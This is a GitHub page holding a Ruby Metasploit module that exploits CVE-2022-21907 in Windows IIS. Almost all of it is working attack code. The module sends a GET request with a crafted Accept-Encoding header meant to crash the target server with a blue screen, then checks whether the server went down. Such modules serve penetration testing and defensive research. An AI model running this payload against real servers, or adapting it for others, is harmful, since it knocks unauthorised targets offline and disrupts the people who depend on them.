-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathrb_dos_iis_2022_21907.rb
103 lines (90 loc) · 3.11 KB
/
rb_dos_iis_2022_21907.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
# frozen_string_literal: true
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
###
#
# This module performs a DOS attack using a simple HTTP request.
#
###
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Dos
def initialize(info = {})
super(
update_info(
info,
'Name' => 'CVE-2022-21907: HTTP Protocol Stack Remote Code Execution' +
' Vulnerability - Windows IIS DOS BlueScreen',
'Description' => 'This module can be used to perform a DOS attack on' +
' IIS server. This module exploit CVE-2022-21907 and causes a Blue' +
' Screen with only one payload.',
'License' => MSF_LICENSE,
'Author' => ['Maurice LAMBERT <mauricelambert434@gmail.com>'],
'Platform' => 'win',
'References' => [
['CVE', '2022-21907'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21907'],
['URL', 'https://github.com/mauricelambert/CVE-2022-21907']
],
'DisclosureDate' => '2022-01-11',
'Notes' => {
'Stability' => [CRASH_OS_RESTARTS],
'Reliability' => [IOC_IN_LOGS],
'SideEffects' => [SCREEN_EFFECTS]
},
)
)
register_options(
[
OptString.new(
'TARGETURI', [true, 'The URI of the IIS Server.', '/'],
)
]
)
end
##
# This module performs a DOS attack using a simple HTTP request.
def run
vprint_status('Trying first connection...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, ''),
'method' => 'GET'
)
if res.nil?
fail_with(
Failure::Unreachable,
"#{peer} - Could not connect to web service - no response"
)
end
vprint_good('First connection OK. Sending payload...')
payload = {
'Accept-Encoding' => Rex::Text.rand_text_alphanumeric(24) +
",&#{Rex::Text.rand_text_alphanumeric(2)}&**" +
"#{Rex::Text.rand_text_alphanumeric(20)}**" +
"#{Rex::Text.rand_text_alphanumeric(1)}," +
"#{Rex::Text.rand_text_alphanumeric(73)}," +
"#{Rex::Text.rand_text_alphanumeric(71)}," +
"#{Rex::Text.rand_text_alphanumeric(27)},***************" +
"*************#{Rex::Text.rand_text_alphanumeric(6)}, *, ,"
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, ''),
'timeout' => 1,
# short timeout -> the server should not respond
'method' => 'GET',
'headers' => payload
})
vprint_good('Payload is sent. Check that the server is down...')
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, ''),
'method' => 'GET'
)
if res.nil?
print_good('Target is down.')
else
print_error('Target is not vulnerable and up.')
end
end
end